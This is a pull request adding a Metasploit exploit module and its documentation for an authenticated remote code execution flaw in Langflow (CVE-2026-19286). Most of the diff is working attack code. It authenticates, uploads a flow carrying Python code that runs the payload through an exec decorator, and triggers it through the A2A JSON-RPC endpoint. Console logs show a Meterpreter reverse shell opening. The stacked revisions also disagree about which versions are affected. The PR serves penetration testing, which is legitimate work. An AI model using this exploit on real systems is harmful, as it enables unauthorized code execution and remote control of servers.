### PR TITLE
ENH: Exploit module for Langflow Authenticated Remote Code Execution vulnerability CVE-2026-19286

### DIFF
--- a/documentation/modules/exploit/multi/http/langflow_auth_rce_cve_2026_19286.md
+++ b/documentation/modules/exploit/multi/http/langflow_auth_rce_cve_2026_19286.md
@@ -5,19 +5,19 @@ execution due to improper enforcement of security restrictions on the A2A public
 
 The vulnerability affects:
 
-    * Langflow <= 1.11.1
+    * Langflow versions 1.11.0 and 1.11.1
 
 
 This module was successfully tested on:
 
-    * Langflow 1.10.0 installed with Docker
+    * Langflow 1.11.0 installed with Docker
 
 
 ### Installation
 1. Install your favorite virtualization engine (VirtualBox or VMware) on your preferred platform.
 2. Install Ubuntu Linux (or other Linux distro) in your virtualization engine.
-3. Pull pre-built Langflow docker container (v1.10.0) in your VM.
-   `docker pull langflowai/langflow:1.10.0`
+3. Pull pre-built Langflow docker container (v1.11.0) in your VM.
+   `docker pull langflowai/langflow:1.11.0`
 4. Start the langflow container.
 
 
@@ -28,7 +28,7 @@ sudo docker run -d \
   -e LANGFLOW_SUPERUSER=root \
   -e LANGFLOW_SUPERUSER_PASSWORD=root \
   --restart unless-stopped \
-  langflowai/langflow:1.10.0 \
+  langflowai/langflow:1.11.0 \
 ```
 
 ## Verification Steps

--- a/documentation/modules/exploit/multi/http/langflow_auth_rce_cve_2026_19286.md
+++ b/documentation/modules/exploit/multi/http/langflow_auth_rce_cve_2026_19286.md
@@ -1,6 +1,6 @@
 ## Vulnerable Application
 
-Langflow versions 1.11.1 and below are susceptible to authenticated remote code
+Langflow versions 1.11.0 and 1.11.1 susceptible to authenticated remote code
 execution due to improper enforcement of security restrictions on the A2A public endpoint.
 
 The vulnerability affects:

--- a/documentation/modules/exploit/multi/http/langflow_auth_rce_cve_2026_19286.md
+++ b/documentation/modules/exploit/multi/http/langflow_auth_rce_cve_2026_19286.md
@@ -1,8 +1,7 @@
 ## Vulnerable Application
 
-Langflow versions 1.11.1 and below are susceptible to authenticated remote code execution.
-By saving a flow where `data.type` is empty, an authenticated user can bypass the flow guard and execute
-arbitrary Python code.
+Langflow versions 1.11.1 and below are susceptible to authenticated remote code
+execution due to improper enforcement of security restrictions on the A2A public endpoint.
 
 The vulnerability affects:
 
@@ -47,21 +46,23 @@ sudo docker run -d \
 ## Scenarios
 
 ```
-msf > use exploit/multi/http/langflow_auth_rce_cve_2026_19286
+msf > use multi/http/langflow_auth_rce_cve_2026_19286
 [*] No payload configured, defaulting to python/meterpreter/reverse_tcp
-msf exploit(multi/http/langflow_auth_rce_cve_2026_19286) > set RHOSTS 192.168.1.30
-RHOSTS => 192.168.1.30
+msf exploit(multi/http/langflow_auth_rce_cve_2026_19286) > set RHOSTS 172.17.0.2
+RHOSTS => 172.17.0.2
+msf exploit(multi/http/langflow_auth_rce_cve_2026_19286) > set LHOST 10.23.131.254
+LHOST => 10.23.131.254
 msf exploit(multi/http/langflow_auth_rce_cve_2026_19286) > set USERNAME root
 USERNAME => root
 msf exploit(multi/http/langflow_auth_rce_cve_2026_19286) > set PASSWORD root
 PASSWORD => root
 msf exploit(multi/http/langflow_auth_rce_cve_2026_19286) > exploit
-[*] Started reverse TCP handler on 192.168.1.30:4444 
+[*] Started reverse TCP handler on 10.23.131.254:4444
 [*] Running automatic check ("set AutoCheck false" to disable)
-[+] The target appears to be vulnerable. Version 1.10.0 detected, which appears vulnerable.
+[+] The target appears to be vulnerable. Version 1.11.0 detected, which appears vulnerable.
+[*] Sending stage (34548 bytes) to 172.17.0.2
 [*] Payload sent successfully.
-[*] Sending stage (34544 bytes) to 172.17.0.2
-[*] Meterpreter session 1 opened (192.168.1.30:4444 -> 172.17.0.2:36926) at 2026-08-27 23:40:01 -0400
+[*] Meterpreter session 1 opened (10.23.131.254:4444 -> 172.17.0.2:33042) at 2026-08-29 15:25:36 -0400
 
-meterpreter > 
+meterpreter >
 ```

--- a/documentation/modules/exploit/multi/http/langflow_auth_rce_cve_2026_19286.md
+++ b/documentation/modules/exploit/multi/http/langflow_auth_rce_cve_2026_19286.md
@@ -1,0 +1,67 @@
+## Vulnerable Application
+
+Langflow versions 1.11.1 and below are susceptible to authenticated remote code execution.
+By saving a flow where `data.type` is empty, an authenticated user can bypass the flow guard and execute
+arbitrary Python code.
+
+The vulnerability affects:
+
+    * Langflow <= 1.11.1
+
+
+This module was successfully tested on:
+
+    * Langflow 1.10.0 installed with Docker
+
+
+### Installation
+1. Install your favorite virtualization engine (VirtualBox or VMware) on your preferred platform.
+2. Install Ubuntu Linux (or other Linux distro) in your virtualization engine.
+3. Pull pre-built Langflow docker container (v1.10.0) in your VM.
+   `docker pull langflowai/langflow:1.10.0`
+4. Start the langflow container.
+
+
+```
+sudo docker run -d \
+  --name langflow \
+  -p 192.168.1.30:7860:7860 \
+  -e LANGFLOW_SUPERUSER=root \
+  -e LANGFLOW_SUPERUSER_PASSWORD=root \
+  --restart unless-stopped \
+  langflowai/langflow:1.10.0 \
+```
+
+## Verification Steps
+
+1. Install the application
+2. Start msfconsole
+3. Do: `use exploit/multi/http/langflow_unauth_rce_cve_2026_19286`
+4. Do: `run lhost=<lhost> rhost=<rhost> username=<username> password=<password>`
+5. You should get a meterpreter
+
+
+## Options
+
+
+## Scenarios
+
+```
+msf > use exploit/multi/http/langflow_auth_rce_cve_2026_19286
+[*] No payload configured, defaulting to python/meterpreter/reverse_tcp
+msf exploit(multi/http/langflow_auth_rce_cve_2026_19286) > set RHOSTS 192.168.1.30
+RHOSTS => 192.168.1.30
+msf exploit(multi/http/langflow_auth_rce_cve_2026_19286) > set USERNAME root
+USERNAME => root
+msf exploit(multi/http/langflow_auth_rce_cve_2026_19286) > set PASSWORD root
+PASSWORD => root
+msf exploit(multi/http/langflow_auth_rce_cve_2026_19286) > exploit
+[*] Started reverse TCP handler on 192.168.1.30:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Version 1.10.0 detected, which appears vulnerable.
+[*] Payload sent successfully.
+[*] Sending stage (34544 bytes) to 172.17.0.2
+[*] Meterpreter session 1 opened (192.168.1.30:4444 -> 172.17.0.2:36926) at 2026-08-27 23:40:01 -0400
+
+meterpreter > 
+```

--- a/documentation/modules/exploit/multi/http/langflow_auth_rce_cve_2026_19286.md
+++ b/documentation/modules/exploit/multi/http/langflow_auth_rce_cve_2026_19286.md
@@ -1,7 +1,13 @@
 ## Vulnerable Application
 
-Langflow versions 1.11.0 and 1.11.1 susceptible to authenticated remote code
-execution due to improper enforcement of security restrictions on the A2A public endpoint.
+ Langflow versions 1.0.0 through 1.11.1 are susceptible to authenticated
+ remote code execution due to improper enforcement of security restrictions
+ on the `api/v1/a2a/<flow_id>/jsonrpc` endpoint. The endpoint fails to
+ invoke `validate_public_flow_no_code_execution()`, allowing a low-privileged
+ authenticated attacker to upload a malicious flow and then execute it.
+
+ Arbitrary code is executed under the context of the running Langflow backend
+ process.
 
 The vulnerability affects:
 

--- a/modules/exploits/multi/http/langflow_auth_rce_cve_2026_19286.rb
+++ b/modules/exploits/multi/http/langflow_auth_rce_cve_2026_19286.rb
@@ -223,7 +223,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     return Exploit::CheckCode::Unknown('Failed to parse version.') unless version
 
-    if version < Rex::Version.new('1.11.1')
+    if version < Rex::Version.new('1.11.2')
       return Exploit::CheckCode::Appears(
         "Version #{version} detected, which appears vulnerable."
       )

--- a/modules/exploits/multi/http/langflow_auth_rce_cve_2026_19286.rb
+++ b/modules/exploits/multi/http/langflow_auth_rce_cve_2026_19286.rb
@@ -108,32 +108,35 @@ class MetasploitModule < Msf::Exploit::Remote
     injected_code = [
       'from langflow.custom import Component',
       'from langflow.io import Output, MessageTextInput',
-      'from lfx.schema.data import Data',
+      'from langflow.schema.data import Data',
       "class #{component_name}(Component):",
       "    display_name='#{component_display_name}'",
       "    name = '#{name}'",
       "    inputs = [MessageTextInput(display_name='#{input_display_name}', name='#{input_name}')]\n",
       "    outputs = [Output(display_name='#{output_display_name}', name='#{output_name}', method='#{output_method}')]",
       "    @exec(\"#{payload.encode}\")",
-      '    def r(self) -> Data:',
+      "    def #{output_method}(self) -> Data:",
       '        return Data(data={})'
     ].join("\n")
 
-    crafted_flow = {
+    flow = {
       'name' => name,
       'description' => description,
+      'flow_type' => 'agent',
+      'a2a_enabled' => true,
+      'access_type' => 'PUBLIC',
       'data' => {
         'nodes' => [
           {
-            'id' => "pwn-#{node_id}",
-            'type' => 'CustomComponent',
+            'id' => node_id,
+            'type' => 'genericNode',
             'position' => {
               'x' => 0,
               'y' => 0
             },
             'data' => {
-              'id' => "pwn-#{SecureRandom.hex(4)}",
-              'type' => 'CustomComponent',
+              'id' => node_id,
+              'type' => '',
               'node' => {
                 'template' => {
                   '_type' => 'Component',
@@ -150,18 +153,29 @@ class MetasploitModule < Msf::Exploit::Remote
                   }
                 },
                 'description' => description,
-                'display_name' => component_display_name,
                 'base_classes' => ['Data'],
+                'display_name' => 'Comp',
+                'name' => 'Comp',
+                'frozen' => false,
                 'outputs' => [
                   {
                     'types' => ['Data'],
                     'selected' => 'Data',
                     'name' => output_name,
                     'display_name' => output_display_name,
-                    'method' => output_method
+                    'method' => output_method,
+                    'value' => '__UNDEFINED__',
+                    'cache' => true,
+                    'allows_loop' => false,
+                    'tool_mode' => false,
+                    'hidden' => nil,
+                    'required_inputs' => nil,
+                    'group_outputs' => false
                   }
                 ],
-                'field_order' => ['code']
+                'field_order' => ['code'],
+                'beta' => false,
+                'edited' => false
               }
             }
           }
@@ -177,7 +191,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'Content-Type' => 'application/json',
         'Authorization' => "Bearer #{token}"
       },
-      'data' => crafted_flow.to_json
+      'data' => flow.to_json
     )
 
     unless res&.code&.between?(200, 299)
@@ -241,17 +255,34 @@ class MetasploitModule < Msf::Exploit::Remote
       fail_with(Failure::UnexpectedReply, 'Langflow did not return a flow ID.')
     end
 
+    rpc_payload = {
+      'jsonrpc' => '2.0',
+      'id' => SecureRandom.hex(16),
+      'method' => 'message/send',
+      'params' => {
+        'message' => {
+          'messageId' => SecureRandom.hex(16),
+          'role' => 'user',
+          'parts' => [
+            {
+              'type' => 'text',
+              'text' => 'run'
+            }
+          ]
+        }
+      }
+    }
+
     res = send_request_cgi(
       'method' => 'POST',
       'uri' => normalize_uri(
         target_uri.path,
-        "api/v1/build/#{flow_id}/flow"
+        "api/v1/a2a/#{flow_id}/jsonrpc"
       ),
       'headers' => {
-        'Content-Type' => 'application/json',
-        'Authorization' => "Bearer #{token}"
+        'Content-Type' => 'application/json'
       },
-      'data' => {}.to_json
+      'data' => rpc_payload.to_json
     )
 
     unless res&.code&.between?(200, 299)

--- a/modules/exploits/multi/http/langflow_auth_rce_cve_2026_19286.rb
+++ b/modules/exploits/multi/http/langflow_auth_rce_cve_2026_19286.rb
@@ -1,0 +1,263 @@
+# frozen_string_literal: true
+
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Langflow AI authenticated RCE',
+        'Description' => %q{
+          Langflow versions 1.11.1 and below are susceptible to authenticated
+          remote code execution. By saving a flow where `data.type` is empty,
+          an authenticated user can bypass the flow guard and execute
+          arbitrary Python code.
+        },
+        'Author' => [
+          'Richard Howe <rhowe425>'
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2026-19286'],
+          ['URL', 'https://www.ibm.com/support/pages/node/7284733']
+        ],
+        'Targets' => [
+          [
+            'Python payload',
+            {
+              'Platform' => 'python',
+              'Arch' => ARCH_PYTHON
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'Payload' => {
+          'BadChars' => '"'
+        },
+        'DisclosureDate' => '2026-08-28',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS],
+          'Reliability' => [REPEATABLE_SESSION]
+        }
+      )
+    )
+
+    register_options(
+      [
+        Opt::RPORT(7860),
+        OptString.new(
+          'TARGETURI',
+          [true, 'Base path of the Langflow application', '/']
+        ),
+        OptString.new(
+          'USERNAME',
+          [true, 'Langflow login username', '']
+        ),
+        OptString.new(
+          'PASSWORD',
+          [true, 'Langflow login password', '']
+        )
+      ]
+    )
+  end
+
+  def get_token(username, password)
+    data = {
+      'username' => username,
+      'password' => password
+    }
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'api/v1/login'),
+      'vars_post' => data
+    )
+
+    return unless res&.code&.between?(200, 299)
+
+    json = res.get_json_document
+    return unless json.is_a?(Hash)
+
+    json['access_token']
+  end
+
+  def create_flow(token)
+    node_id = Rex::Text.rand_text_alpha(8)
+    component_display_name = Rex::Text.rand_text_alpha(5)
+    component_name = "Exploit#{Rex::Text.rand_text_alpha(5)}"
+
+    output_display_name = Rex::Text.rand_text_alpha(5)
+    output_name = Rex::Text.rand_text_alpha(5).downcase
+    output_method = Rex::Text.rand_text_alpha(5).downcase
+
+    input_display_name = Rex::Text.rand_text_alpha(5)
+    input_name = Rex::Text.rand_text_alpha(5).downcase
+    name = Rex::Text.rand_text_alpha(5).downcase
+    description = Rex::Text.rand_text_alpha(8)
+
+    injected_code = [
+      'from langflow.custom import Component',
+      'from langflow.io import Output, MessageTextInput',
+      'from lfx.schema.data import Data',
+      "class #{component_name}(Component):",
+      "    display_name='#{component_display_name}'",
+      "    name = '#{name}'",
+      "    inputs = [MessageTextInput(display_name='#{input_display_name}', name='#{input_name}')]\n",
+      "    outputs = [Output(display_name='#{output_display_name}', name='#{output_name}', method='#{output_method}')]",
+      "    @exec(\"#{payload.encode}\")",
+      '    def r(self) -> Data:',
+      '        return Data(data={})'
+    ].join("\n")
+
+    crafted_flow = {
+      'name' => name,
+      'description' => description,
+      'data' => {
+        'nodes' => [
+          {
+            'id' => "pwn-#{node_id}",
+            'type' => 'CustomComponent',
+            'position' => {
+              'x' => 0,
+              'y' => 0
+            },
+            'data' => {
+              'id' => "pwn-#{SecureRandom.hex(4)}",
+              'type' => 'CustomComponent',
+              'node' => {
+                'template' => {
+                  '_type' => 'Component',
+                  'code' => {
+                    'type' => 'code',
+                    'required' => true,
+                    'show' => true,
+                    'multiline' => true,
+                    'value' => injected_code,
+                    'name' => 'code',
+                    'password' => false,
+                    'advanced' => false,
+                    'dynamic' => false
+                  }
+                },
+                'description' => description,
+                'display_name' => component_display_name,
+                'base_classes' => ['Data'],
+                'outputs' => [
+                  {
+                    'types' => ['Data'],
+                    'selected' => 'Data',
+                    'name' => output_name,
+                    'display_name' => output_display_name,
+                    'method' => output_method
+                  }
+                ],
+                'field_order' => ['code']
+              }
+            }
+          }
+        ],
+        'edges' => []
+      }
+    }
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'api/v1/flows/'),
+      'headers' => {
+        'Content-Type' => 'application/json',
+        'Authorization' => "Bearer #{token}"
+      },
+      'data' => crafted_flow.to_json
+    )
+
+    unless res&.code&.between?(200, 299)
+      fail_with(Failure::UnexpectedReply, 'Unable to upload the vulnerable flow.')
+    end
+
+    json = res.get_json_document
+    return unless json.is_a?(Hash)
+
+    json['id']
+  end
+
+  def check
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'api/v1/version')
+    )
+
+    return Exploit::CheckCode::Unknown('Unexpected server reply.') unless res&.code == 200
+
+    doc = res.get_json_document
+
+    version_str = doc.is_a?(Hash) ? doc['version'] : nil
+    return Exploit::CheckCode::Unknown('Failed to parse version.') unless version_str
+
+    package = doc.is_a?(Hash) ? doc['package'] : nil
+    return Exploit::CheckCode::Unknown('Failed to identify application.') unless package
+
+    unless package.to_s.downcase == 'langflow'
+      return Exploit::CheckCode::Safe('Application is not Langflow.')
+    end
+
+    version = Rex::Version.new(version_str.to_s)
+
+    return Exploit::CheckCode::Unknown('Failed to parse version.') unless version
+
+    if version < Rex::Version.new('1.11.1')
+      return Exploit::CheckCode::Appears(
+        "Version #{version} detected, which appears vulnerable."
+      )
+    end
+
+    Exploit::CheckCode::Safe(
+      "Version #{version} detected, which is not vulnerable."
+    )
+  end
+
+  def exploit
+    username = datastore['USERNAME']
+    password = datastore['PASSWORD']
+
+    token = get_token(username, password)
+
+    if token.to_s.empty?
+      fail_with(Failure::UnexpectedReply, 'Could not authenticate with Langflow API.')
+    end
+
+    flow_id = create_flow(token)
+
+    if flow_id.to_s.empty?
+      fail_with(Failure::UnexpectedReply, 'Langflow did not return a flow ID.')
+    end
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(
+        target_uri.path,
+        "api/v1/build/#{flow_id}/flow"
+      ),
+      'headers' => {
+        'Content-Type' => 'application/json',
+        'Authorization' => "Bearer #{token}"
+      },
+      'data' => {}.to_json
+    )
+
+    unless res&.code&.between?(200, 299)
+      fail_with(Failure::UnexpectedReply, 'Unable to trigger the vulnerability.')
+    end
+
+    print_status('Payload sent successfully.')
+  end
+end

--- a/modules/exploits/multi/http/langflow_auth_rce_cve_2026_19286.rb
+++ b/modules/exploits/multi/http/langflow_auth_rce_cve_2026_19286.rb
@@ -17,7 +17,7 @@ class MetasploitModule < Msf::Exploit::Remote
         info,
         'Name' => 'Langflow AI authenticated RCE',
         'Description' => %q{
-          Langflow versions 1.11.1 and below are susceptible to authenticated
+          Langflow versions 1.11.0 and 1.11.1 are susceptible to authenticated
           remote code execution due to improper enforcement of security restrictions
           on the A2A public endpoint.
         },

--- a/modules/exploits/multi/http/langflow_auth_rce_cve_2026_19286.rb
+++ b/modules/exploits/multi/http/langflow_auth_rce_cve_2026_19286.rb
@@ -18,9 +18,8 @@ class MetasploitModule < Msf::Exploit::Remote
         'Name' => 'Langflow AI authenticated RCE',
         'Description' => %q{
           Langflow versions 1.11.1 and below are susceptible to authenticated
-          remote code execution. By saving a flow where `data.type` is empty,
-          an authenticated user can bypass the flow guard and execute
-          arbitrary Python code.
+          remote code execution due to improper enforcement of security restrictions
+          on the A2A public endpoint.
         },
         'Author' => [
           'Richard Howe <rhowe425>'
@@ -100,21 +99,17 @@ class MetasploitModule < Msf::Exploit::Remote
     output_name = Rex::Text.rand_text_alpha(5).downcase
     output_method = Rex::Text.rand_text_alpha(5).downcase
 
-    input_display_name = Rex::Text.rand_text_alpha(5)
-    input_name = Rex::Text.rand_text_alpha(5).downcase
     name = Rex::Text.rand_text_alpha(5).downcase
     description = Rex::Text.rand_text_alpha(8)
 
     injected_code = [
       'from langflow.custom import Component',
-      'from langflow.io import Output, MessageTextInput',
+      'from langflow.io import Output',
       'from langflow.schema.data import Data',
+      '_fired = [False]',
       "class #{component_name}(Component):",
       "    display_name='#{component_display_name}'",
-      "    name = '#{name}'",
-      "    inputs = [MessageTextInput(display_name='#{input_display_name}', name='#{input_name}')]\n",
-      "    outputs = [Output(display_name='#{output_display_name}', name='#{output_name}', method='#{output_method}')]",
-      "    @exec(\"#{payload.encode}\")",
+      "    @(lambda f: (_fired[0] or (_fired.__setitem__(0, True), exec(compile(\"#{payload.encode}\", '<string>', 'exec'))), f)[-1])",
       "    def #{output_method}(self) -> Data:",
       '        return Data(data={})'
     ].join("\n")

--- a/modules/exploits/multi/http/langflow_auth_rce_cve_2026_19286.rb
+++ b/modules/exploits/multi/http/langflow_auth_rce_cve_2026_19286.rb
@@ -1,5 +1,3 @@
-# frozen_string_literal: true
-
 ##
 # This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
@@ -15,11 +13,16 @@ class MetasploitModule < Msf::Exploit::Remote
     super(
       update_info(
         info,
-        'Name' => 'Langflow AI authenticated RCE',
+        'Name' => 'Langflow AI JSON RPC Authenticated RCE',
         'Description' => %q{
-          Langflow versions 1.11.0 and 1.11.1 are susceptible to authenticated
+          Langflow versions 1.0.0 through 1.11.1 are susceptible to authenticated
           remote code execution due to improper enforcement of security restrictions
-          on the A2A public endpoint.
+          on the `api/v1/a2a/<flow_id>/jsonrpc` endpoint. The endpoint fails to
+          invoke `validate_public_flow_no_code_execution()`, allowing a low-privileged
+          authenticated attacker to upload a malicious flow and then execute it.
+
+          Arbitrary code is executed under the context of the running Langflow backend
+          process.
         },
         'Author' => [
           'Richard Howe <rhowe425>'
@@ -39,6 +42,7 @@ class MetasploitModule < Msf::Exploit::Remote
           ]
         ],
         'DefaultTarget' => 0,
+        'DefaultOptions' => { 'RPORT' => 7860 },
         'Payload' => {
           'BadChars' => '"'
         },
@@ -90,17 +94,19 @@ class MetasploitModule < Msf::Exploit::Remote
     json['access_token']
   end
 
-  def create_flow(token)
-    node_id = Rex::Text.rand_text_alpha(8)
-    component_display_name = Rex::Text.rand_text_alpha(5)
-    component_name = "Exploit#{Rex::Text.rand_text_alpha(5)}"
+  def create_flow
+    generator = Rex::RandomIdentifier::Generator.new(language: :python)
 
-    output_display_name = Rex::Text.rand_text_alpha(5)
-    output_name = Rex::Text.rand_text_alpha(5).downcase
-    output_method = Rex::Text.rand_text_alpha(5).downcase
+    node_id = generator.generate(length: 8)
+    component_display_name = generator.generate(length: 5)
+    component_name = "Exploit#{generator.generate(length: 5)}"
 
-    name = Rex::Text.rand_text_alpha(5).downcase
-    description = Rex::Text.rand_text_alpha(8)
+    output_display_name = generator.generate(length: 5)
+    output_name = generator.generate(length: 5)
+    output_method = generator.generate(length: 5)
+
+    name = generator.generate(length: 5)
+    description = generator.generate(length: 8)
 
     injected_code = [
       'from langflow.custom import Component',
@@ -184,7 +190,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri' => normalize_uri(target_uri.path, 'api/v1/flows/'),
       'headers' => {
         'Content-Type' => 'application/json',
-        'Authorization' => "Bearer #{token}"
+        'Authorization' => "Bearer #{@token}"
       },
       'data' => flow.to_json
     )
@@ -238,25 +244,25 @@ class MetasploitModule < Msf::Exploit::Remote
     username = datastore['USERNAME']
     password = datastore['PASSWORD']
 
-    token = get_token(username, password)
+    @token = get_token(username, password)
 
-    if token.to_s.empty?
+    if @token.to_s.empty?
       fail_with(Failure::UnexpectedReply, 'Could not authenticate with Langflow API.')
     end
 
-    flow_id = create_flow(token)
+    @flow_id = create_flow
 
-    if flow_id.to_s.empty?
+    if @flow_id.to_s.empty?
       fail_with(Failure::UnexpectedReply, 'Langflow did not return a flow ID.')
     end
 
     rpc_payload = {
       'jsonrpc' => '2.0',
-      'id' => SecureRandom.hex(16),
+      'id' => Rex::Text.rand_text_hex(32),
       'method' => 'message/send',
       'params' => {
         'message' => {
-          'messageId' => SecureRandom.hex(16),
+          'messageId' => Rex::Text.rand_text_hex(32),
           'role' => 'user',
           'parts' => [
             {
@@ -272,7 +278,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'method' => 'POST',
       'uri' => normalize_uri(
         target_uri.path,
-        "api/v1/a2a/#{flow_id}/jsonrpc"
+        "api/v1/a2a/#{@flow_id}/jsonrpc"
       ),
       'headers' => {
         'Content-Type' => 'application/json'


### PR DESCRIPTION
## Description
This pull request adds a new exploit module that detects and exploits an authenticated remote code execution vulnerability impacting Langflow versions 1.11.0 and 1.11.1

**NOTE:** A2A functionality was not added to Langflow until version 1.11.0. [Public CVE documentation](https://www.ibm.com/support/pages/node/7284733) does not do the best job at making it clear which versions of Langflow are vulnerable to this CVE.

Take a look at Langflow's [public release announcement](https://www.langflow.org/blog/langflow-1-11/) for 1.11 for confirmation.

**Related Issue:** 
Fixes #21844 

## Breaking Changes
None

## Reviewer Notes


## Verification Steps
1. `docker pull` and `docker run` langflow, per documentation
2. Start msfconsole
3. Do: `use exploit/multi/http/langflow_auth_rce_cve_2026_19286`
4. Do: `run lhost=<lhost> rhost=<rhost> username=<username> password=<password>`
5. Do: `exploit`
6. You should get a meterpreter session



## Test Evidence
<img width="923" height="364" alt="image" src="https://github.com/user-attachments/assets/5722e1c9-d36a-4e0d-a1e1-5fdcce7b541a" />


## Environment

| Field | Details |
|-------|---------|
| **Operating System** |  Ubuntu 22.04 |
| **Target Software/Hardware** | langflow 1.10.0 |
| **Docker Image / Vagrant Setup** | langflowai/langflow:1.10.0 |

## AI Usage Disclosure
None



## Pre-Submission Checklist

- [X] Included a corresponding documentation markdown file in `documentation/modules` _(new modules only)_
- [X] No sensitive information (IP addresses, credentials, API keys, hashes) in code or documentation
- [X] Tested on the target environment specified in the Environment section above
- [X] Included RSpec tests for library changes _(encouraged for `lib/` changes)_
- [X] Read the [CONTRIBUTING.md](https://github.com/rapid7/metasploit-framework/blob/master/CONTRIBUTING.md) and [module acceptance guidelines](https://docs.metasploit.com/docs/development/maintainers/process/guidelines-for-accepting-modules-and-enhancements.html)